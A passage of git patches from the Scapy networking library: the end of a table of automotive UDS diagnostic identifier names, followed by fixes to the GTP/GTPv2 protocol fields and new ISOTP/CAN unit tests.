"measured CJ135 Mode sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd6d] = "probable CJ135 Mode sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd6e] = "Duty cycle control powerstage heater sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd6f] = "Lambda signal quality sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd70] = "effective heater voltage reqested by heater control from heater power stage control sensor 1 bank" -UDS_RDBI.dataIdentifiers[0xfd71] = "cylinder counter of knock control" -UDS_RDBI.dataIdentifiers[0xfd72] = "Knock amplification factor 0" -UDS_RDBI.dataIdentifiers[0xfd73] = "Knock amplification factor" -UDS_RDBI.dataIdentifiers[0xfd74] = "Knock amplification factor" -UDS_RDBI.dataIdentifiers[0xfd75] = "Normalized reference level of knock control" -UDS_RDBI.dataIdentifiers[0xfd76] = "Normalized reference level of knock control" -UDS_RDBI.dataIdentifiers[0xfd77] = "Normalized reference level of knock control" -UDS_RDBI.dataIdentifiers[0xfd78] = "normalized reference level of knock control" -UDS_RDBI.dataIdentifiers[0xfd79] = "Effective injection time" -UDS_RDBI.dataIdentifiers[0xfd7a] = "Effective injection time for cylinder" -UDS_RDBI.dataIdentifiers[0xfd7b] = "Effective injection time for cylinder 4" -UDS_RDBI.dataIdentifiers[0xfd7c] = "Applied ignition angle for cylinder" -UDS_RDBI.dataIdentifiers[0xfd7d] = "Applied ignition angle for cylinder" -UDS_RDBI.dataIdentifiers[0xfd7e] = "Applied ignition angle for cylinder 4" -UDS_RDBI.dataIdentifiers[0xfd7f] = "Knock amplification factor" -UDS_RDBI.dataIdentifiers[0xfd80] = "Effective injection time" -UDS_RDBI.dataIdentifiers[0xfd81] = "Effective injection time" -UDS_RDBI.dataIdentifiers[0xfd82] = "Applied ignition angle" -UDS_RDBI.dataIdentifiers[0xfd83] = "Applied ignition angle" -UDS_RDBI.dataIdentifiers[0xfd84] = "Applied ignition angle" -UDS_RDBI.dataIdentifiers[0xfdd2] = "ROE Variant" -UDS_RDBI.dataIdentifiers[0xfe00] = "ISFTFiltVC" -UDS_RDBI.dataIdentifiers[0xfe01] = "HwAcc SST O" -UDS_RDBI.dataIdentifiers[0xfe02] = "BTCIIBSNormal" -UDS_RDBI.dataIdentifiers[0xfe03] = "START STOP" -UDS_RDBI.dataIdentifiers[0xfe04] = "BTCCIC" -UDS_RDBI.dataIdentifiers[0xfe05] = "BTCCShunt" -UDS_RDBI.dataIdentifiers[0xfe06] = "BTCCBattery" -UDS_RDBI.dataIdentifiers[0xfe07] = "BTCRShunt" -UDS_RDBI.dataIdentifiers[0xfe08] = "BTCTauIS" -UDS_RDBI.dataIdentifiers[0xfe09] = "BTCTauIA" -UDS_RDBI.dataIdentifiers[0xfe10] = "POWER SUPPLY AND BATTERY SWITCH IO" -UDS_RDBI.dataIdentifiers[0xfe11] = "HwAcc SYS O" -UDS_RDBI.dataIdentifiers[0xfe12] = "POWER SUPPLY AND BATTERY SWITCH" -UDS_RDBI.dataIdentifiers[0xfe13] = "BTCTauBA" -UDS_RDBI.dataIdentifiers[0xfe14] = "OB PowerSupply Switching STUETZKONZEPT IO" -UDS_RDBI.dataIdentifiers[0xfe15] = "OB PowerSupply Switching STUETZKONZEPT" -UDS_RDBI.dataIdentifiers[0xfe16] = "WURQuiesActvLmt" -UDS_RDBI.dataIdentifiers[0xfe17] = "WURVoltLmt" -UDS_RDBI.dataIdentifiers[0xfe18] = "SHIFT BY WIRE IO" -UDS_RDBI.dataIdentifiers[0xfe19] = "SHIFT BY WIRE" -UDS_RDBI.dataIdentifiers[0xfe1a] = "Door Contacts" -UDS_RDBI.dataIdentifiers[0xfe1b] = "Door Contacts IO" -UDS_RDBI.dataIdentifiers[0xfe20] = "SBC LIN" -UDS_RDBI.dataIdentifiers[0xfe21] = "SBC LIN IO" -UDS_RDBI.dataIdentifiers[0xfe22] = "CAN Interfaces IO" -UDS_RDBI.dataIdentifiers[0xfe23] = "BTS" -UDS_RDBI.dataIdentifiers[0xfe24] = "BTS IO" -UDS_RDBI.dataIdentifiers[0xfe25] = "LADESCHALTUNG Charging Circuit IO" -UDS_RDBI.dataIdentifiers[0xfe26] = "LADESCHALTUNG Charging Circuit" -UDS_RDBI.dataIdentifiers[0xfe27] = "TAG3 LIN HFA LIN BLE IO" -UDS_RDBI.dataIdentifiers[0xfe28] = "Ethernet IO" -UDS_RDBI.dataIdentifiers[0xfe29] = "Ethernet" -UDS_RDBI.dataIdentifiers[0xfe2a] = "DRCIGradient3" -UDS_RDBI.dataIdentifiers[0xfe2b] = "DRCIGradient4" -UDS_RDBI.dataIdentifiers[0xfe2c] = "DRCIGradient5" -UDS_RDBI.dataIdentifiers[0xfe2d] = "DRCTClass1" -UDS_RDBI.dataIdentifiers[0xfe2e] = "DRCTClass2" -UDS_RDBI.dataIdentifiers[0xfe2f] = "DRCTClass3" -UDS_RDBI.dataIdentifiers[0xfe30] = " 100Base Tx IO" -UDS_RDBI.dataIdentifiers[0xfe31] = "Broadr Reach IO" -UDS_RDBI.dataIdentifiers[0xfe32] = "DRCIClass3" -UDS_RDBI.dataIdentifiers[0xfe33] = "DRCIClass4" -UDS_RDBI.dataIdentifiers[0xfe34] = "DRCIClass5" -UDS_RDBI.dataIdentifiers[0xfe35] = "DRCRStepMax" -UDS_RDBI.dataIdentifiers[0xfe36] = "DRCFilterLow" -UDS_RDBI.dataIdentifiers[0xfe37] = "DRCFilterHigh" -UDS_RDBI.dataIdentifiers[0xfe38] = "ISFTM" -UDS_RDBI.dataIdentifiers[0xfe50] = "OMCMaxTransTime" -UDS_RDBI.dataIdentifiers[0xfee0] = "FEE1 FEFF" -UDS_RDBI.dataIdentifiers[0xfee5] = "Dummy message configuration for Ignition control tester request" -UDS_RDBI.dataIdentifiers[0xfee9] = "Dummy message configuration for Injection control tester request" -UDS_RDBI.dataIdentifiers[0xfeff] = "Supplier component reset" -UDS_RDBI.dataIdentifiers[0xff61] = "FIMs" -UDS_RDBI.dataIdentifiers[0xff62] = "inverter signals" diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index a0f66136fc2..9ceff24fe7c 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -13,7 +13,7 @@ import struct -from scapy.compat import chb, orb +from scapy.compat import chb, orb, bytes_encode from scapy.error import warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, FieldLenField, FieldListField, FlagsField, IntField, \ @@ -167,18 +167,22 @@ def m2i(self, pkt, val): if left == 0xf: ret.append(TBCD_TO_ASCII[right:right + 1]) else: - ret += [TBCD_TO_ASCII[right:right + 1], TBCD_TO_ASCII[left:left + 1]] # noqa: E501 + ret += [ + TBCD_TO_ASCII[right:right + 1], + TBCD_TO_ASCII[left:left + 1] + ] return b"".join(ret) def i2m(self, pkt, val): - val = str(val) - ret_string = "" + if not isinstance(val, bytes): + val = bytes_encode(val) + ret_string = b"" for i in range(0, len(val), 2): tmp = val[i:i + 2] if len(tmp) == 2: - ret_string += chr(int(tmp[1] + tmp[0], 16)) + ret_string += chb(int(tmp[::-1], 16)) else: - ret_string += chr(int("F" + tmp[0], 16)) + ret_string += chb(int(b"F" + tmp[:1], 16)) return ret_string @@ -495,7 +499,9 @@ def m2i(self, pkt, s): return s def i2m(self, pkt, s): - s = b"".join(chb(len(x)) + x for x in s.split(".")) + if not isinstance(s, bytes): + s = bytes_encode(s) + s = b"".join(chb(len(x)) + x for x in s.split(b".")) return s diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 9b664ae0fc6..c7927b86e20 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -25,7 +25,8 @@ from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, IntField, IPField, LongField, PacketField, \ PacketListField, ShortEnumField, ShortField, StrFixedLenField, \ - StrLenField, ThreeBytesField, XBitField, XIntField, XShortField + StrLenField, ThreeBytesField, XBitField, XIntField, XShortField, \ + FieldLenField from scapy.data import IANA_ENTERPRISE_NUMBERS from scapy.packet import bind_layers, Packet, Raw from scapy.volatile import RandIP, RandShort @@ -628,7 +629,7 @@ class IE_IMSI(gtp.IE_Base): class IE_Cause(gtp.IE_Base): name = "IE Cause" fields_desc = [ByteEnumField("ietype", 2, IEType), - ShortField("length", None), + ShortField("length", 6), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("Cause", 1, CAUSE_VALUES), @@ -641,7 +642,7 @@ class IE_Cause(gtp.IE_Base): class IE_RecoveryRestart(gtp.IE_Base): name = "IE Recovery Restart" fields_desc = [ByteEnumField("ietype", 3, IEType), - ShortField("length", None), + ShortField("length", 5), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("restart_counter", 0)] @@ -650,7 +651,8 @@ class IE_RecoveryRestart(gtp.IE_Base): class IE_APN(gtp.IE_Base): name = "IE APN" fields_desc = [ByteEnumField("ietype", 71, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="APN", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.APNStrLenField("APN", "internet", @@ -660,7 +662,7 @@ class IE_APN(gtp.IE_Base): class IE_AMBR(gtp.IE_Base): name = "IE AMBR" fields_desc = [ByteEnumField("ietype", 72, IEType), - ShortField("length", None), + ShortField("length", 12), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("AMBR_Uplink", 0), @@ -670,7 +672,8 @@ class IE_AMBR(gtp.IE_Base): class IE_MSISDN(gtp.IE_Base): name = "IE MSISDN" fields_desc = [ByteEnumField("ietype", 76, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="digits", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("digits", "33123456789", diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 558fd2e5eb7..4240a8753c1 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -53,16 +53,17 @@ a = IP(raw(IP()/UDP()/GTP_U_Header()/PPP())) assert isinstance(a[GTP_U_Header].payload, PPP) = GTPCreatePDPContextRequest(), basic instantiation -gtp = IP(src="127.0.0.1")/UDP(dport=2123)/GTPHeader(teid=2807)/GTPCreatePDPContextRequest() +gtp = IP(src="127.0.0.1", dst="127.0.0.1")/UDP(dport=2123, sport=2123)/GTPHeader(teid=2807)/GTPCreatePDPContextRequest() gtp.dport == 2123 and gtp.teid == 2807 and len(gtp.IE_list) == 5 = GTPCreatePDPContextRequest(), basic dissection -~ random_weird_py3 random.seed(0x2807) rg = raw(gtp) -print(rg) -assert rg in [b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\x1a\xc30\x10\x00'\x00\x00\n\xf7\x10\xd6\xd2\xf6\xd8\x14\x0b\x85\x00\x04\xa3\xad\x98\xfa\x85\x00\x04F\\`\xd6\x87\x00\x0fBCD5lPP8N2u8h9l", - b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\xd3\xf20\x10\x00'\x00\x00\n\xf7\x107m\xaeV\x14\x08\x85\x00\x04\x83\x92K\xa3\x85\x00\x04\xb7\xb2\xff\xd0\x87\x00\x0foTrnmM9erqfhqpV"] +rg +assert rg in [ + b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007\x99\xce0\x10\x00'\x00\x00\n\xf7\x10\x12\x05\xf7(\x14\x0b\x85\x00\x04\xb7\xd0\xbf \x85\x00\x04\xe2\xb8\x88\x19\x87\x00\x0ffOTLcIukpXKxV0Z", + b"E\x00\x00K\x00\x01\x00\x00@\x11|\x9f\x7f\x00\x00\x01\x7f\x00\x00\x01\x08K\x08K\x007n\xb20\x10\x00'\x00\x00\n\xf7\x10\x91\x9f\xbc\xaa\x14\x07\x85\x00\x04<\x7f\x87\x14\x85\x00\x04\xbcU\x14\xcb\x87\x00\x0f9Co27Fbj65eKHyQ", +] = GTPV1UpdatePDPContextRequest(), dissect h = "3333333333332222222222228100a38408004588006800000000fd1134820a2a00010a2a00024aa5084b005408bb32120044ed99aea9386f0000100000530514058500040a2a00018500040a2a000187000c0213921f739680fe74f2ffff94000130970001019800080112f41004d204d29900024000b6000101" diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 931756bd973..83caf074228 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -43,6 +43,7 @@ ie.IMSI == b"2080112345670000" = IE_IMSI, basic instantiation ie = IE_IMSI(ietype='IMSI', length=8, IMSI='2080112345670000') ie.ietype == 1 and ie.IMSI == b'2080112345670000' +assert bytes(ie) == b'\x01\x00\x08\x00\x02\x08\x112Tv\x00\x00' = IE_Cause, dissection h = "3333333333332222222222228100838408004588004a00000000fd1193160a2a00010a2a0002084b824600366a744823002a45e679235ea151000200020010005d001800490001006c0200020010005700090081000010927f000002558d3b69" @@ -85,6 +86,7 @@ ie.APN == b'aaaaaaaaaaaaaaaaaaaaaaaaa' = IE_APN, basic instantiation ie = IE_APN(ietype='APN', length=26, APN='aaaaaaaaaaaaaaaaaaaaaaaaa') ie.ietype == 71 and ie.APN == b'aaaaaaaaaaaaaaaaaaaaaaaaa' +assert bytes(ie) == b'G\x00\x1a\x00\x19aaaaaaaaaaaaaaaaaaaaaaaaa' = IE_AMBR, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" @@ -136,6 +138,7 @@ ie.digits == b'111111111111' = IE_MSISDN, basic instantiation ie = IE_MSISDN(ietype='MSISDN', length=6, digits='111111111111') ie.ietype == 76 and ie.digits == b'111111111111' +assert bytes(ie) == b'L\x00\x06\x00\x11\x11\x11\x11\x11\x11' = IE_Indication, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 7f3a2bd2e4c..712bdacfc34 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -151,12 +151,76 @@ assert(p.data == b"") assert(p.src is None and p.dst is None and p.exsrc is None and p.exdst is None) assert(bytes(p) == b"") -= Creation of a simple ISOTP packet with source += Creation of a simple ISOTP packet with src p = ISOTP(b"eee", src=0x241) assert(p.src == 0x241) assert(p.data == b"eee") assert(bytes(p) == b"eee") += Creation of a simple ISOTP packet with exsrc +p = ISOTP(b"eee", exsrc=0x41) +assert(p.exsrc == 0x41) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with dst +p = ISOTP(b"eee", dst=0x241) +assert(p.dst == 0x241) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with exdst +p = ISOTP(b"eee", exdst=0x41) +assert(p.exdst == 0x41) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with src, dst, exsrc, exdst +p = ISOTP(b"eee", src=1, dst=2, exsrc=3, exdst=4) +assert(p.dst == 2) +assert(p.exdst == 4) +assert(p.src == 1) +assert(p.exsrc == 3) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with src validation error +ex = False +try: + p = ISOTP(b"eee", src=0x1000000000, dst=2, exsrc=3, exdst=4) +except Scapy_Exception: + ex = True + +assert ex + += Creation of a simple ISOTP packet with dst validation error +ex = False +try: + p = ISOTP(b"eee", src=0x10, dst=0x20000000000, exsrc=3, exdst=4) +except Scapy_Exception: + ex = True + +assert ex + += Creation of a simple ISOTP packet with exsrc validation error +ex = False +try: + p = ISOTP(b"eee", src=0x10, dst=2, exsrc=3000, exdst=4) +except Scapy_Exception: + ex = True + +assert ex + + += Creation of a simple ISOTP packet with exdst validation error +ex = False +try: + p = ISOTP(b"eee", src=0x10, dst=2, exsrc=30, exdst=400) +except Scapy_Exception: + ex = True + +assert ex + + ISOTPFrame related checks = Build a packet with extended addressing @@ -358,6 +422,16 @@ assert(fragment.flags == 0) assert(fragment.length == 5) assert(fragment.reserved == 0) += Fragment a 4 bytes long ISOTP message extended +fragments = ISOTP(b"data", dst=0x1fff0000).fragment() +assert(len(fragments) == 1) +assert(isinstance(fragments[0], CAN)) +fragment = CAN(bytes(fragments[0])) +assert(fragment.data == b"\x04data") +assert(fragment.length == 5) +assert(fragment.reserved == 0) +assert(fragment.flags == 4) + = Fragment a 7 bytes long ISOTP message fragments = ISOTP(b"abcdefg").fragment() assert(len(fragments) == 1) @@ -410,6 +484,22 @@ isotp.show() assert(isotp.data == b"test") assert(isotp.dst == 0x641) += Defragment non ISOTP message +fragments = [CAN(identifier=0x641, data=b"\xa4test")] +isotp = ISOTP.defragment(fragments) +assert isotp is None + += Defragment exception +fragments = [] +ex = False +try: + isotp = ISOTP.defragment(fragments) + isotp.show() +except Scapy_Exception: + ex = True + +assert ex + = Defragment an ISOTP message composed of multiple CAN frames fragments = [ CAN(identifier=0x641, data=dhex("41 10 10 61 62 63 64 65")), @@ -988,6 +1078,61 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s cans.close() += Send two-frame ISOTP message with bs +cans = new_can_socket(iface0) +acker_ready = threading.Event() +def acker(): + acks = new_can_socket(iface0) + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + can = can_pkt[0] + acks.send(CAN(identifier = 0x241, data=dhex("30 20 00"))) + acks.close() + +Thread(target=acker).start() +acker_ready.wait(timeout=5) +with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 20 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) + +cans.close() + + += Send two-frame ISOTP message with ST +cans = new_can_socket(iface0) +acker_ready = threading.Event() +def acker(): + acks = new_can_socket(iface0) + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + can = can_pkt[0] + acks.send(CAN(identifier = 0x241, data=dhex("30 00 10"))) + acks.close() + +Thread(target=acker).start() +acker_ready.wait(timeout=5) +with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 10")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) + +cans.close() + = Receive a single frame ISOTP message with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: cans = new_can_socket(iface0) diff --git a/tox.ini b/tox.ini index d15df8b66cb..2d7f7ebb817 100644 --- a/tox.ini +++ b/tox.ini @@ -62,6 +62,7 @@ commands = bash -c "rm -rf /tmp/can-utils /tmp/can-isotp" lsmod sudo -E {envpython} -m coverage run -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs} + coverage combine [testenv] @@ -141,7 +142,7 @@ description = "Check code for Grammar mistakes" skip_install = true deps = codespell # inet6, dhcp6 and the ipynb files contains french: ignore them -commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*.ipynb,*.svg,*.gif,*.obs,scapy/contrib/automotive/daimler/definitions.py" scapy/ doc/ test/ .github/ +commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*.ipynb,*.svg,*.gif,*.obs" scapy/ doc/ test/ .github/ [testenv:twine] @@ -166,7 +167,6 @@ commands = flake8 scapy/ ignore = E731, W504 per-file-ignores = scapy/all.py:F403,F401 - scapy/contrib/automotive/daimler/definitions.py:E501 scapy/contrib/automotive/obd/obd.py:F405,F403 scapy/contrib/automotive/obd/pid/pids.py:F405,F403 scapy/contrib/automotive/obd/scanner.py:F405,F403,E501 From f68971fb8c971e533b64d8b5a6520d54779bed36 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 23 Feb 2020 13:36:01 -0500 Subject: [PATCH 0007/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 73 +++++++++++++++++++++++++---------------- 1 file changed, 44 insertions(+), 29 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index c7927b86e20..f728a4d9dbb 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -629,7 +629,7 @@ class IE_IMSI(gtp.IE_Base): class IE_Cause(gtp.IE_Base): name = "IE Cause" fields_desc = [ByteEnumField("ietype", 2, IEType), - ShortField("length", 6), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("Cause", 1, CAUSE_VALUES), @@ -642,7 +642,7 @@ class IE_Cause(gtp.IE_Base): class IE_RecoveryRestart(gtp.IE_Base): name = "IE Recovery Restart" fields_desc = [ByteEnumField("ietype", 3, IEType), - ShortField("length", 5), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("restart_counter", 0)] @@ -662,7 +662,7 @@ class IE_APN(gtp.IE_Base): class IE_AMBR(gtp.IE_Base): name = "IE AMBR" fields_desc = [ByteEnumField("ietype", 72, IEType), - ShortField("length", 12), + ShortField("length", 8), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("AMBR_Uplink", 0), @@ -672,8 +672,7 @@ class IE_AMBR(gtp.IE_Base): class IE_MSISDN(gtp.IE_Base): name = "IE MSISDN" fields_desc = [ByteEnumField("ietype", 76, IEType), - FieldLenField("length", None, length_of="digits", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("digits", "33123456789", @@ -737,53 +736,69 @@ class IE_Indication(gtp.IE_Base): ConditionalField( BitField("CPSR", 0, 1), lambda pkt: pkt.length > 3), ConditionalField( - BitField("NSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("NSI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("UASI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("DTCI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("BDWI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("PSCI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("PCRI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("AOSI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("AOPI", 0, 1), lambda pkt: pkt.length > 4), + ConditionalField( + BitField("ROAAI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("UASI", 0, 1), lambda pkt: pkt.length > 3), + BitField("EPCOSI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("DTCI", 0, 1), lambda pkt: pkt.length > 3), + BitField("CPOPCI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("BDWI", 0, 1), lambda pkt: pkt.length > 3), + BitField("PMTSMI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("PSCI", 0, 1), lambda pkt: pkt.length > 3), + BitField("S11TF", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("PCRI", 0, 1), lambda pkt: pkt.length > 3), + BitField("PNSI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("AOSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("UNACCSI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("AOPI", 0, 1), lambda pkt: pkt.length > 3), + BitField("WPMSI", 0, 1), lambda pkt: pkt.length > 5), ConditionalField( - BitField("ROAAI", 0, 1), lambda pkt: pkt.length > 3), + BitField("5GSNN26", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("EPCOSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("REPREFI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("CPOPCI", 0, 1), lambda pkt: pkt.length > 3), + BitField("5GSIWKI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("PMTSMI", 0, 1), lambda pkt: pkt.length > 3), + BitField("EEVRSI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("S11TF", 0, 1), lambda pkt: pkt.length > 3), + BitField("LTEMUI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("PNSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("LTEMPI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("UNACCSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("ENBCRSI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("WPMSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("TSPCMI", 0, 1), lambda pkt: pkt.length > 6), ConditionalField( - BitField("5GSNN26", 0, 1), lambda pkt: pkt.length > 3), + BitField("Spare", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("REPREFI", 0, 1), lambda pkt: pkt.length > 3), + BitField("Spare", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("5GSIWKI", 0, 1), lambda pkt: pkt.length > 3), + BitField("Spare", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("EEVRSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("N5GNMI", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("LTEMUI", 0, 1), lambda pkt: pkt.length > 3), + BitField("5GCNRS", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("LTEMPI", 0, 1), lambda pkt: pkt.length > 3), + BitField("5GCNRI", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("ENBCRSI", 0, 1), lambda pkt: pkt.length > 3), + BitField("5SRHOI", 0, 1), lambda pkt: pkt.length > 7), ConditionalField( - BitField("TSPCMI", 0, 1), lambda pkt: pkt.length > 3), + BitField("ETHPDN", 0, 1), lambda pkt: pkt.length > 7), ] From 3a727fb5b0f60fc8aab2c84a01ca8e44d37b9485 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 24 Feb 2020 10:04:48 -0500 Subject: [PATCH 0008/1632] remove trailing spaces scapy/contrib/gtp_v2.py Co-Authored-By: Pierre Lalet --- scapy/contrib/gtp_v2.py | 1 - 1 file changed, 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index f728a4d9dbb..fa7e248de64 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -480,7 +480,6 @@ class IE_UCI(gtp.IE_Base): BitField("SPARE", 0, 4), BitField("LCSG", 0, 1), BitField("CMI", 0, 1)] - class IE_FTEID(gtp.IE_Base): name = "IE F-TEID" From d223f4d32eb653a096b095c800439d7278415b22 Mon Sep 17 00:00:00 2001 From: Miklos Tirpak Date: Fri, 28 Feb 2020 15:30:20 +0100 Subject: [PATCH 0009/1632] GTP: fix IPv6 in GSN Address IE --- scapy/contrib/gtp.py | 7 +++++-- test/contrib/gtp.uts | 20 +++++++++++++++----- 2 files changed, 20 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 9ceff24fe7c..16b375741d6 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -531,7 +531,10 @@ class IE_GSNAddress(IE_Base): name = "GSN Address" fields_desc = [ByteEnumField("ietype", 133, IEType), ShortField("length", 4), - IPField("address", RandIP())] + ConditionalField(IPField("ipv4_address", RandIP()), + lambda pkt: pkt.length == 4), + ConditionalField(IP6Field("ipv6_address", '::1'), + lambda pkt: pkt.length == 16)] class IE_MSInternationalNumber(IE_Base): @@ -939,7 +942,7 @@ class GTPPDUNotificationRequest(Packet): IE_TEICP(TEICI=RandInt()), IE_EndUserAddress(PDPTypeNumber=0x21), # noqa: E501 IE_AccessPointName(), - IE_GSNAddress(address="127.0.0.1"), # noqa: E501 + IE_GSNAddress(ipv4_address="127.0.0.1"), # noqa: E501 ], IE_Dispatcher)] diff --git a/test/contrib/gtp.uts 